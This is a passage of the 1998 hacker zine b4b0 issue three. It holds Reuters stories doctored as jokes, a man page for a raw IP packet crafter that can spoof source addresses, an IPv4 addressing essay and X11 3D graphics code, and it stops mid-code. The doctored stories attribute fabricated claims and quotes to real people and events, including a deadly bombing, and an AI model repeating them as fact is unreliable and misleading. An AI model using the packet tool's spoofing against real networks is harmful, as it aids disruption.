Mirrors/Zines
1
0
Fork 0
mirror of https://github.com/fdiskyou/Zines.git synced 2025-03-09 00:00:00 +01:00
Code Issues Releases Wiki Activity
Zines/b4b0/b4b0-03.txt
fdiskyou 180dfff1cc bring back some more
2017-12-10 21:54:57 +00:00

2089 lines
76 KiB
Text
Raw Blame History

.s$s
.s$$'`$$s.
.s$$'
b 4 .s$$$' b 0 +-+-+-+-+
`$$$&s. |b|4|b|0|
`$SSs. +-+-+-+-+
`$s. .s$$$$' [ (c) 1998 the b4b0 party programme ]
`$$$$$$$$$' [ all rights reserved be0tch. ]
[ oh yes. ]
[ number three. ]
[ wee! ]
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
thiz episodez theme:
"everybody is entitled to their own opinion as long as they are american."
.-------------------.
| table of contentz |
`-------------------'
(1) introduction . . . - [jsbach]
(2) b4b0 world newz - [ge0rge]
(3) ippacket 2.0 - [chrak]
(4) The Preservation of IPv4 - [r4lph]
(5) An introduction to 3D graphics programming - [aqua]
(6) ASM on the Linux/i386 platform - [chrak]
(7) b4b0 misc, warnings, etc [ge0rge]
(8) Golf Telephony Juarez - [Qytpo]
(9) a fuqn awesome minicom static buffer overflow - [ohday]
(A) a high level sockets API - [presonic]
(B) writing lkm's - [segv]
(C) HP-UX security pt 2 - [tip]
(D) Compiled Sparc Assembly Language d0x - [various !]
writerz, misc.
-------------
The Fearless Leader of b4b0! ge0rge
Some Canadian Kid r4lph m4lph
An English Stealer-of-American Women gR3-0p
Manager of the Hotel California phFh4ck3r
Not Usually Around lh0ar
Guy With a Big Afro qytpo
Mister Nice Guy tEEp
White, Black, Male, Female KuR4cK
Loves Frosted Flakes seegn4l
The Bovine Rebel thE miLk
An Aussie Be0tch d00k
Harpoon boy pres0niq
greets:
_jenna, vect0rx, sadjester, ashtray lumber jacks, monica lewinski, bin
laden, bert & ernie, c0t, israel, afghanistan (your guns are on the way),
sudan, r4lphs mom, mira sorvino, seegn4l's dad, katie holmes, and newt
gingrich.
fuck yous:
"the establishment", siliteks father, siliteks mom, silitek, United States
Government, Coolio, #hackphreak, irc warriorz, you ppl who knock on my
door asking if i want to buy books, you people who come and talk to me
about god when im on the street, you people who come and arrest me for
pissing on your car, and you people who don't l0ve b4b0!
Official Idiot(s) Of the Month (more than one this issue)
------------------------------
coolio this kid has absolutely NO skill whatsoever at anything. Please,
do your part and make fun of him for a better america.
JP of Antionline.com. You figure it out.
Quote(s) of the Month
------------------
"dude, I'm diverse" -r4lph m4lph
"I want to publish zines, and rage against the machine..."
-"Flagpole Sitta" Harvey Danger
"Did I miss a fucking meeting with the coffee?"
- "Lock and Load" Dennis Leary
"Everyone is so1o until proven otherwise."
- ekiM
[ introduction - jsbach ]-x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Hi, I'm the editor for this edition of b4b0.
We decided that we'd trade off editorship each issue... At any rate,
it'd be cool if we started getting submissions from people on the inet, so that
not all the articles are by the regular b4b0 staff. For now, you can send
feedback, articles, etc to --> submissions@b4b0.org
If u don't have a submission but have something to say send it to
letters@b4b0.org !!
SORRY ABOUT THE LATENESS OF THIS ISSUE
ITS JUST PEOPLE SAY THEY WILL WRITE SHIT
AND THEN THEY DON'T
*****************************************************************/
[ 2 - b4b0 w0rld gn00z! ]- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
FDA says 69 deaths among U.S. b4b0 readers
By Jonathan Wright
WASHINGTON (Reuters) - At least 69 Americans who took the
erection-enhancing zine b4b0 died in the first four months it was on
the market, the Food and Drug Administration (FDA) said in a new
report.
But the deaths, which have been mounting steadily over the months, may
not indicate any special danger from the b4b0 Inc. (b4b0 - news)
zine, given the age, health and large number of men who are reading it,
specialists said.
Doctors have written out 3.6 million prescriptions and millions of men
have read the zine, which was hailed on its release in March as the
long-awaited wonder zine for many men who had difficulty getting an
erection.
``If there is a one in 100,000 chance of something happening that's
pretty low ... What I tell my patients is that there is uncertainty. I
think it's a safe zine but I think long-term studies are going to tell
us how this works out,'' James Barada, a urologist in Albany, New
York, told Reuters Wednesday.
The FDA, collating voluntary accounts from many sources, said 18 of
the patients died during or immediately after sexual intercourse.
Within a further five hours of reading the zine, seven others had begun
to show whatever symptoms eventually led to death, said the the report
that was posted Monday on the agency's Internet site.
Dr. David Flockhart, an expert in zine interactions at Georgetown
University in Washington, said in a recent interview that it would be
very hard to blame such deaths on b4b0.
``I wonder what the baseline death rate is without b4b0,'' he said.
``How many people die during the act anyway?''
``If you age-index it for how many medical problems the individuals
have and you take out those who took it inappropriately, I don't know
of any huge disasters,'' William Steers of the University of Virginia
said of earlier figures.
The FDA noted that the link with b4b0 was circumstantial and it did
not know how comprehensive its data was.
``An accumulation of adverse event reports does not necessarily
indicate that the adverse event was caused by the zine. The event may
be due to an underlying disease or some other factor or factors,'' the
report said.
``As with all approved medications, the FDA will continue to monitor
the ... safety of b4b0 by carefully reviewing reports of death and
other serious adverse events and will continue to evaluate the need
for regulatory action,'' it added.
The FDA received reports of 123 patients dying after being prescribed
b4b0, including 12 foreigners. In the case of 30, the reports were
from unverifiable sources and another 12 people may not have read the
zine, despite having the prescription.
Of the remaining 69 U.S. patients -- 66 identified as men and three of
unidentified gender -- two had strokes and 46 had cardiovascular
events. The cause of death was unknown or not mentioned in the other
21 cases.
Reports to the FDA gave ages for 55 of the dead. They ranged from 29
to 87, with a median of 64, it said.
Fifty-one of the 69 patients had one or more of the factors associated
with cardiovascular diseases or cerebrovascular disease, such as
hypertension, smoking or obesity.
Twelve of the men who died had taken nitroglycerin or a nitrate
medication, which can be fatal if taken in conjunction with b4b0.
b4b0 acts by enhancing the muscle relaxant effects of nitric oxide,
a chemical that is normally released in response to sexual
stimulation. This allows increased blood flow into certain areas of
the penis, leading to an erection.
The labeling warns patients not to mix it with nitrate-based heart
drugs and advises a thorough medical examination before the drug is
prescribed.
``There is a degree of cardiac risk associated with sexual activity;
therefore, physicians may wish to consider the cardiovascular status
of their patients prior to initiating any treatments for erectile
dysfunction,'' the labeling adds.
But one consumer group, Public Citizen, said last week that the
labeling was not strong enough.
``The FDA, in their rush to approve this zine, never put this zine
before an advisory committee,'' said Dr. Sidney Wolfe, director of
Public Citizen's health research group.
``There are a number of studies in different species showing damaged
blood vessels with long-term use. This is not terribly surprising but
there is no mention in the labeling,'' he added.
The American College of Cardiology and the American Heart Association
have expressed concern about the use of b4b0 by patients with any
kind of heart disease.
Barada, who helped draw up erectile dysfunction guidelines for the
American Urological Association, said he was concerned about the
deaths because some people may have a special sensitivity to the zine
and some doctors might be prescribing it to the wrong people.
``There may be a population that is more sensitive to these zines than
we were able to pick up in the trials. It may be playing Russian
roulette with an elite zine ,'' he said.
S.Africa refuses to be stage of global conflict
By Emma Thomasson
CAPE TOWN (Reuters) - A bomb that exploded in a Cape Town restaurant
was apparently linked to U.S. strikes on b4b0!, but South Africa
warned Wednesday it would not allow its territory to become a stage
for foreign conflict.
``We cannot allow our country to become a theater for experiments in
international terrorism,'' South African Safety and Security Minister
Sydney Mufamadi told a news conference.
Police initially said two people had died in Tuesday's blast at Cape
Town's Planet Hollywood restaurant. They said 27 were also injured.
On Wednesday, however, police spokesman Wicus Holtzhausen told Reuters
there had been an error and that only one person, separately
identified as 50-year-old bank employee Fanie Schoeman, died at the
scene when his legs were blown off.
``There was a lot of confusion between ambulance people. One guy said
one died on the scene and one died on his way to hospital. But it was
the same guy,'' he said.
Mufamadi said detectives who helped probe the recent bombing of the
U.S. embassy in Nairobi were due to arrive later on Wednesday to help
investigate the attack.
``We feel there is something that can be gained by sharing
experiences, sharing notes,'' he said.
President Nelson Mandela said he was certain the police had good leads
on the bombing and b4b0.
``I have no doubt that b4b0 actually committed this crime and I'm
confident that they're going to arrest them,'' Mandela said after a
function at a school in rural Transkei.
Police spokesman John Sterrenberg told Reuters investigators were
viewing video material, thought to be from the restaurant's security
cameras, but said he could not give further details for fear of
jeopardizing the probe.
The South African Broadcasting Corporation said in its main news
bulletin that it was in possession of video footage of a b4b0 member
in the blast but would not release it in the interest of ongoing
investigations.
Two callers, claiming to represent the local b4b0 group told the Cape
Talk radio station on Tuesday the bombing was in retaliation for U.S.
missile attacks on Afghanistan and Sudan last week.
The group later denied it was behind the attack. A spokeswoman
declined to comment on the blast, but told Reuters all would be
revealed at a news conference on Thursday morning.
President Clinton said he had ordered the raids in retaliation for the
bombings of the U.S. embassies in Nairobi and Dar es Salaam and to
forestall further attacks.
He said the targets were operations linked to Saudi-born Moslem
militant Osama Bin Laden (phfH4ck3r as known by b4b0), whom the United
States accuses of organizing and financing the embassy attacks.
Mufamadi said if the Cape Town bombing proved to be linked to the
attacks in Nairobi and Dar es Salaam, it would be the first case of
international terrorism in South Africa.
South African stocks plunged on Wednesday, at one stage shedding
nearly nine percent, as the bomb blast and a sharp rise in producer
inflation fanned renewed fears over stability in emerging markets
worldwide.
A hospital official said eight-year-old British visitor Laura Giddings
lost a foot and, with her three-year-old brother Jacob, was in a
serious condition in hospital. Their father Tony suffered a broken leg
and their mother Mandy and grandfather Brian also were hurt in the
blast.
Mark Lyall Grant, acting British High Commissioner, said his
government condemned the attack, particularly because it had targeted
a popular tourist area.
``This family has been ripped apart by the blast,'' he told a news
conference after visiting the Giddings in hospital.
He said four other British citizens and one Argentinian had also been
injured in the attack. Britain had reviewed its travel advice on South
Africa, which hosts around 300,000 Britons a year, he added.
Britain always warned of the high levels of crime in the country, he
said, but was now urging its citizens to exercise special caution
after the bomb.
Peter Gastrow, an analyst at the South African Institute for Strategic
Studies, told Reuters the blast could pitch Cape Town's small, radical
Muslim community into a world campaign against the United States.
``It enables them to place themselves into the international network
that has similar agendas,'' he said.
Sheikh Achmed Seddik, a spokesman for the Moslem Judicial Council,
condemned the attack.
``We're obviously condemning this bombing in the strongest terms. It
is uncalled for and senseless,'' he told Reuters.
But he said the b4b0 community would go ahead with a march, planned
and approved by police before Tuesday's blast, on the U.S. mission in
Cape Town on Saturday to protest against the U.S. attacks in Sudan and
Afghanistan.
''Terrorist'' tEEp (abu nidal) jailed in Egypt: LA Times
WASHINGTON (Reuters) - Palestinian extremist Abu Nidal (aka tEEp from
the b4b0 zine), ''whose reign over a terrorist network in the 1980s
made him one of the world's most dangerous men,'' is being held by
authorities in Egypt, the Los Angeles Times reported in Tuesday editions.
Quoting unnamed U.S. officials, the Times reported that tEEp
``apparently was caught after he crossed the border from Libya, where
he has been headquartered for several years.'' Few additional details
were known, the newspaper said.
``Recent reports in the Arab press have suggested that tEEp is ailing
and might require advanced medical care unavailable in Libya,'' the
Times reported.
tEEp is linked to ``terrorist attacks in 20 countries that killed or
injured almost 900 people,'' the Times said.
tEEp heads the Fatah Revolutionary Council, one of 12 groups which
had its assets frozen by President Clinton in 1995 for waging
campaigns to undermine the Middle East peace process.
According to the newspaper, Egypt has denied reports about holding
tEEp. It quoted U.S. officials as saying the Egyptian government was
concerned about potential reaction.
Although his organization is smaller than in the past, ``it still
commands several hundred members in the Mideast, including Lebanon,
Sudan, Syria and Iraq, with a 'limited overseas support structure,''
according to the State Department's Patterns of Global Terrorism
1997,'' the Times said.
[ ippacket 2.0 (chrak) ]-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
(the actual program is in b4b0.3.tgz)
ippacket(1) ippacket(1)
NAME
ippacket - constructs ip packets
SYNOPSIS
ippacket <-N> [-p protocol <proto_options>]
DESCRIPTION
constructs ip packets. tcpdump -Svt is useful for use with
this program
OPTIONS
option desc (default)
ALL:
-N if first arg, the program will be run in ncurses
mode
-s source_ip
-d dest_ip
-I IP identification (random)
-T IP ttl (60)
-D data to add to end of any type of packet
-W write outgoing packet to file
-p protocol (IPPROTO_RAW) -p '?' shows other avail-
able protocols
-r <num> (1) -r -1 will repeat packet send forever,
else repeat num times
TCP and UDP:
-x udp/tcp source port (7777)
-y udp/tcp destination port (7778)
TCP only:
-f TCP flags (TH_FIN) -f '?' shows other available
flags
-u urgent pointer (0) use with -f TH_URG
-w tcp window size (512)
-q tcp sequence number size (0)
1
ippacket(1) ippacket(1)
-a tcp ack number size (0)
ICMP only:
-i ICMP type (ICMP_ECHO) -i '?' shows other available
types
EXAMPLES
see /usr/doc/ippacket-2.0/README
BUGS
If i knew theyed be fixed!
AUTHOR
shaki-!!! + fatima!!!
[ The Preservation of IPv4 ] x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
============================================
== The Preservation of IPv4 (sort of) ==
====== Node Network Topology ======= by r4lph
======================= r4lph@b4b0.org
============
|INTRODUCTION|
============
As with all new ideas, you must keep an open mind while reading this document.
"Have some sort of imagination when reading this article", as jsbach has said.
New ideas are meant to be incomplete, and must leave room for improvement.
This article addresses two of the main problems with the existing IP protocol,
IPv4. The first being a shortage of IP addresses, and the second being the
ever increasing size of routing tables. Like I said, the ideas in this
article are far from complete, and not all effects of the "for every
action there is a reaction" adage are worked out.
The reason I wrote this article is because in the very near future the IP
next generation (IPng) group, are going to shove something in our faces
called IPv6, and I think it sucks. The arival of something like IPv6 is
inevitable, although I have grown to close to IPv4 to just watch it be
over taken by IPv6 without even looking at another possible solution.
==========
|BACKGROUND|
==========
Here I'm just going to give a little bit of background, it's probably not
needed for those of you that are at all familiar with IP. Ok, under IPv4,
we're running out of IP addresses to assign, plain and simple. Not only
that, but with the exponensial growth of the internet, routing tables on
internet gateways/routers are becoming larger and larger.
There have been several efforts in the past, and present, to work with
IPv4 efficiently until IPv6 is fully implemented. The Internet Assigned
Numbers Authority (IANA), the dudes that give you your IP addresses if you
request a class A, B, or C, have made many a plea to the internet
community, to return unused IP addresses. Classless Inter-Domain Routing
(CIDR) was also an effort made in the early 90's to help reduce routing
table size, and help conserve IP addresses by eliminating the idea of
classes. For more information, consult RFC's - 1517, 1518, 1519, and 1520.
This approach was succesful for a while, but as the internet grows, no
matter how we try to save IP addresses, we need MORE. As it is, the
number of 32 bit IP addresses in existance, including class D and class E
addresses is 4294967296 (2^32). Sounds like alot doesn't it? Well do the
math for the proposed 128 bit IP address in IPv6.
======
|THEORY|
======
The basic theory behind my entire idea, is that only internet
gateways/routers are assigned IP addresses. If you have a subnet with a
router or gateway, it is assigned an IP address also. The rest of the
computers on your network are assigned an 8 bit "node address". This "node
address" is not assigned by any central authority like the IANA, and it
need not be registered anywhere other than the router or gateway governing
the subnet, or net that the computer in question is on. Now some of you
might be thinking, "oh so the internal computers are invisible to the
internet", well no, they're not. If you think about a gateway that has the
IP address 1.1.1.1 and under the gateway there are 5 nodes, numbered 1-5,
the rest of the internet sees the 3rd node on this network as 1.1.1.1-3.
I'll show you how we let the gateway/router know what node to pass the
packet along to in a later section, along with all the other more detailed
information about these concepts. As you can see, by assigning only
gateways/routers IP addresses, we can use them efficiently, and
surely have enouph of them to serve the internet community. Strain on
routers is removed due to the fact that they must only "know" about other
routers/gateways.
=========
|SPECIFICS|
=========
Now I will explain the details of this idea, and the problems that it may
pose. I left alot of areas untouched or unfinished for various reasons
from, "I dont know enouph about the subject", to, "it would just make the
file to facking BIG". First off I will explain the new IP packet
structure. It's very simple, only 2 fields must be added, an 8 bit
destination node field, and an 8 bit source node field. These 8 bit fields
allow for 256 nodes under any one router/gateway. The new IP packet header
is illustrated in FIG.1 (Taken from rfc791).
FIG.1
*NOTE* Each "-" represents 1 bit.
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source-Node | Dest-Node | Options |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Options(cont)| Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
So the idea is that "Source-Node" is the computer under the gateway/router
with the IP address in "Source Address", and "Dest-Node" is the computer
under the gateway/router with the IP address in "Destination Address".
All routing between the two gateways/routers that the nodes in question
belong to proceeds as it would with normal IPv4 implementations. The
"Source-Node" and "Dest-Node" fields are transparent to all routers
in between the "Source Address" and "Destination Address"
gateways/routers.
When the destination gateway/router gets the packet, it
will forward it to the node in the "Dest-Node" field. The computer which
just recieved the packet will send a packet back in the same manner. It
will use the "Source-Node" address of the incoming packet as the
"Dest-Node" in the outgoing packet. And it's own node address as the
"Source-Node" in the outgoing packet. The rest of the packet fields are
filled out as they would be normally, and the packet is sent. Again, the
"Dest-Node" and "Source-Node" fields are transparent to all
gateways/routers en route to the "Destination Address", upon arrival, the
"Destination Address" gateway/router forwards the packet to the node in
"Dest-Node". Heres a time line, IP addresses/node addresses are
represented like this, 1.1.1.1-14, given that 1.1.1.1 is the IP address of
the router/gateway and 14 is the node address of the computer under
1.1.1.1.
- 1.1.1.1 is the source gateway
- 8.8.8.8 is the destination gateway
- 2.3.4.5 is misc. internet router no.1
- 3.4.5.6 is misc. internet router no.2
* node number 5 on the under the source gateway wants to send a packet to
* node number 12 under the destination gateway.
[1] 1.1.1.1-5 --> 1.1.1.1
[2] 1.1.1.1 --> 2.3.4.5
[3] 2.3.4.5 --> 3.4.5.6
[4] 3.4.5.6 --> 8.8.8.8
[5] 8.8.8.8 --> 8.8.8.8-12
[1] The source node sends the packet to the source gateway.
[2] The source gateway sends the packet to misc. router no.1.
[3] Misc. router no.1 sends the packet to misc. router no.2.
[4] Misc. router no.2 sends the packet to the destination gateway.
[5] The destination gateway sends the packet to the destination node.
A method of assigning node addresses to an ethernet interface would have
to be developed. Something like the use of "ifconfig" to assign IP
addresses to ethernet interfaces. Routing tables on gateways/routers would
have to be modified to take into consideration the node addresses that are
under that gateway. To route packets to another subnet on the same
network, you'd use the same procedure as to route to a completely
different network. Protocols that do not have IP below them must be
modified to reflect the "node" concept. Other protocols need little to no
modification.
==========
|CONCLUSION|
==========
The concept of Node Network Topology is less than complete, but it's not
that far fetched. With some further developement, some of these ideas
could be implemented (like that will ever happen). Anyways, I think we
need more ideas like this as alternatives to IPv6 for IPng to consider.
This type of network would require many rewritten network configuration
tools, and everyday applications would need to be modified to reflect this
idea. If you have any comments or additions , email me, digital@legions.org.
r4lph
digital@legions.org
[Beginning 3D Programming (jsbach) ]-x- -x- -x- -x- -x- -x- -x- -x- -x-
b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
------------------------------------------------------------------------------
Beginning 3D Programming
(c) aqua 1998
all rights reserved
email: jsb4ch@hotmail.com
------------------------------------------------------------------------------
Seeing a freeware C/asm 3D engine was what motivated me to learn to
code... There is nothing like being able to explore the surreal sort of
mathematical universe one can create inside her computer. In some sense,
to be a computer programmer, is to be a GOD !$@#& =). Given a 500 dollar
piece of shit 486, you can create a virtual universe in which you can
explore and create for your entire life if you are so inclined.
The following is a *basic* and short introduction to 3D programming...
Nothing interactive, and not much math. In other words, this will bore
and patronize ppl who know their sh10t ;). I'm not a good tutorial
author.. USE THE SOURCE AND FIGURE IT OUT "!!!" =)
****************************
**** 3D CONCEPTS ***********
****************************
The idea behind 3D computer graphics is that we need to represent 3
dimensional coordinates on a 2 dimensional plane ( the screen "!" ).
Suppose we had these coordinates:
x y z
coord 1: { 1, 2, 3 }
coord 2: { 1, 2, 4 }
coord 3: { 2, 4, 6 }
Now we want to plot them on the screen. We could just drop the z
coordinate, so we'd be plotting:
coord 1: { 1, 2 }
coord 2: { 1, 2 }
coord 3: { 2, 4 }
This is indeed how some engineering graphing software operates, but it
wouldn't look too realistic in an artificial universe!@#$ Upon quick
examination, we see that coordinates 1 and 2 are plotted in the same
place, although they don't share the same z coordinate.
If you think long and hard, you'll realize that we can simulate three
dimensions on the screen via doing something like this:
3d coords : { x , y , z }
2d coords : { x/z, y/z }
We are taking the z coordinate into account by dividing x and y by it.
The larger z is, the smaller x and y will be (they will appear farther
away), and as z gets smaller, x and y will increase (they will appear
closer). This equation iz simple and beautiful ;)
This is the basis behind my starfield program, listed below. Try to
figure it out ;)
Compile it and run it like this:
% gcc starfield.c -L /usr/X11R6/lib -I /usr/X11R6/include -lX11 -lm
% ./a.out &
/************************************************************************
*****************begin 3d_tutorial_starfield.c "!"***********************
*************************************************************************/
/* by jsbach in like april '98 (i think) */
#include <X11/Xlib.h>
#include <assert.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#define NUM_POINTS 5000
Display *display;
Window window;
GC graph;
int blackcolor, whitecolor, count, count1, viewing_distance;
struct point {
int x;
int y;
int z;
}points[NUM_POINTS];
struct projection {
int x;
int y;
}projections[NUM_POINTS];
void setup(void);
int point(struct point *coord);
main(int argc, int **argv)
{
setup();
for (count=0; count < NUM_POINTS; count++)
{
points[count].x=(rand()%350); /* randomize z points "!" */
points[count].y=(rand()%350);
points[count].z=(rand()%350);
if (points[count].z == 0)
points[count].z=1;
printf("%d %d %d\n", points[count].x, points[count].y, points[count].z);
}
for(;;) {
XEvent e;
XNextEvent(display, &e);
if (e.type == MapNotify)
break;
}
while(1)
{
for(count1=0; count1 < 400; count1++)
{
for(count=0; count < NUM_POINTS; count++)
{
projections[count].x=(points[count].x*viewing_distance+6000)/points[count].z;
projections[count].y=(points[count].y*viewing_distance+6000)/points[count].z;
point((struct projection *)&projections[count]);
}
viewing_distance++;
XClearWindow(display, window);
}
viewing_distance=0;
}
}
int point(struct point *coord)
{
XDrawPoint(display, window, graph, coord->x, coord->y);
}
void setup(void)
{
viewing_distance=0;
display=XOpenDisplay(NULL);
assert(display);
blackcolor=BlackPixel(display, DefaultScreen(display));
whitecolor=WhitePixel(display, DefaultScreen(display));
window=XCreateSimpleWindow(display,DefaultRootWindow(display), 0, 0, 800, 800,
0, blackcolor, blackcolor);
XSelectInput(display, window, StructureNotifyMask);
XMapWindow(display, window);
graph=XCreateGC(display, window, 0, NULL);
XSetForeground(display, graph, whitecolor);
}
/*****************************************************************************
************************END 3d_tutorial_starfield.c*************************
****************************************************************************/
NO! You don't understand it yet! Go back and study it some more !
Ok, if you don't understand the above program, you'll be clueless for the
rest of the tutorial, so FUCK YOU!@$
Anyways, wh0rd, we plotted tons of 3d points on the screen and moved em
around.. Now, it'd be nice to be able to project shapes onto the screen.
To do this, all we need to do is project individual points onto the screen
and then draw lines in between them.
The way I did this in the next example is to have a struct shape{} that
defined connections between points...
There's also a rotation function in here that I'm not going to explain (I
suck at trig and I couldn't explain it worth shit... feel free to rip it
tho ;)
You might call the below program a 3d "engine", because it provides a set
of functions to display and manipulate 3d objects.
/*************************************************************************
************BEGIN minimalist_3d_engine_example.c ************************
*************************************************************************
*/
// camera-less wireframe 3d engine by jsbach
#include <X11/Xlib.h>
#include <assert.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#define MAXPOINTS 50
#define MAXCONNECTIONS 9
Display *display;
Window window;
GC graph;
int blackcolor, whitecolor, count, count,subscript, bleh=0;
float viewing_distance;
/***************** STRUCTURES ***********************/
struct point {
float x;
float y;
float z;
int connection[MAXCONNECTIONS];
int numconnections;
};
struct projection {
float x;
float y;
};
struct object {
struct point points[MAXPOINTS];
struct projection twodee[MAXPOINTS];
struct point location;
char numpoints;
}cube;
/******************* PROTOTYPES ************************/
void drawobject(struct object shape);
void eraseobject(struct object shape);
void rotate(struct object *shape, float degrees_x, float degrees_y);
void project(struct object *shape);
void initialize_shapes(void);
void setup(void);
/***************** MAIN LOOP "!"!"!"!"!"! *****************/
void main(int argc, int **argv)
{
setup();
/* **********INITILIZATIONS************************** */
subscript=0;
subscript++;
cube.points[subscript].x=100;
cube.points[subscript].y=100;
cube.points[subscript].z=100; // 0
cube.points[subscript].connection[0]=1;
cube.points[subscript].connection[1]=2;
cube.points[subscript].connection[2]=3;
cube.points[subscript].numconnections=3;
subscript++;
cube.points[subscript].x=-100;
cube.points[subscript].y=100;
cube.points[subscript].z=100;
cube.points[subscript].connection[0]=4;
cube.points[subscript].connection[1]=6;
cube.points[subscript].connection[2]=7;
cube.points[subscript].numconnections=3;
subscript++;
cube.points[subscript].x=100;
cube.points[subscript].y=-100;
cube.points[subscript].z=100;
cube.points[subscript].connection[0]=4;
cube.points[subscript].connection[1]=5;
cube.points[subscript].connection[2]=7;
cube.points[subscript].numconnections=3;
subscript++;
cube.points[subscript].x=100;
cube.points[subscript].y=100;
cube.points[subscript].z=-100;
cube.points[subscript].connection[0]=5;
cube.points[subscript].connection[1]=6;
cube.points[subscript].connection[2]=7;
cube.points[subscript].connection[3]=8;
cube.points[subscript].numconnections=4;
subscript++;
cube.points[subscript].x=-100;
cube.points[subscript].y=-100;
cube.points[subscript].z=100;
cube.points[subscript].connection[0]=5;
cube.points[subscript].connection[1]=6;
cube.points[subscript].connection[2]=7;
cube.points[subscript].connection[3]=8;
cube.points[subscript].numconnections=4;
subscript++;
cube.points[subscript].x=100;
cube.points[subscript].y=-100;
cube.points[subscript].z=-100; // 5
cube.points[subscript].connection[0]=5;
cube.points[subscript].connection[1]=6;
cube.points[subscript].connection[2]=7;
cube.points[subscript].connection[3]=8;
cube.points[subscript].numconnections=4;
subscript++;
cube.points[subscript].x=-100;
cube.points[subscript].y=100; // 6
cube.points[subscript].z=-100;
cube.points[subscript].connection[0]=5;
//cube.points[subscript].connection[1]=6;
cube.points[subscript].connection[2]=7;
cube.points[subscript].connection[3]=8;
cube.points[subscript].numconnections=3;
subscript++;
cube.points[subscript].x=-100;
cube.points[subscript].y=-100; // 7
cube.points[subscript].z=-100;
cube.points[subscript].connection[0]=5;
cube.points[subscript].connection[1]=6;
cube.points[subscript].connection[2]=7;
cube.points[subscript].connection[3]=8;
cube.points[subscript].numconnections=4;
cube.location.x=300;
cube.location.y=300;
cube.location.z=300;
cube.numpoints=8;
viewing_distance=150;
/***********************************************/
/***********************************************/
XSetForeground(display, graph, whitecolor);
XFillRectangle(display, window, graph, 0, 0, 800, 1000);
/* animation */
while(1)
{
project(&cube);
rotate((struct object *)&cube, .0005, .0005);
//cube.location.z+=.1;
//cube.location.x+=.1;
//cube.location.y-=10;
viewing_distance+=.03;
if (viewing_distance > 320 )
viewing_distance=0;
eraseobject(cube); /* this call is the bottleneck... */
drawobject(cube);
}
}
/******************** END MAIN LOOP BAHAHAHAH ************/
/*************** FUNCTIONS *****************/
void drawpoint(struct point coord)
{
XDrawPoint(display, window, graph, coord.x, coord.y);
}
/**************** DRAW OBJECT *****************/
void drawobject(struct object shape)
{
int temp;
int temp2;
XSetForeground(display, graph, whitecolor);
for(temp=shape.numpoints; temp > 1; temp--)
{
for(temp2=shape.points[temp].numconnections; temp2>0;temp2--)
{
XDrawLine(display, window, graph, shape.twodee[temp].x,
shape.twodee[temp].y,
shape.twodee[shape.points[temp].connection[temp2]].x,
shape.twodee[ shape.points[temp].connection[temp2]].y);
}
}
XFlush(display);
}
void eraseobject(struct object shape)
{
int temp;
int temp2;
XSetForeground(display, graph, blackcolor);
for(temp=shape.numpoints; temp > 1; temp--)
{
for(temp2=shape.points[temp].numconnections; temp2>0;temp2--)
{
XDrawLine(display, window, graph, shape.twodee[temp].x,
shape.twodee[temp].y,
shape.twodee[shape.points[temp].connection[temp2]].x
,
shape.twodee[ shape.points[temp].connection[temp2]].y
);
}
}
XFlush(display);
}
/************* PROJECT OBJECT **********************/
void project(struct object *shape)
{
int temp;
for(temp=shape->numpoints; temp > -1; temp--)
{
if(shape->points[temp].z == 0)
shape->points[temp].z=100;
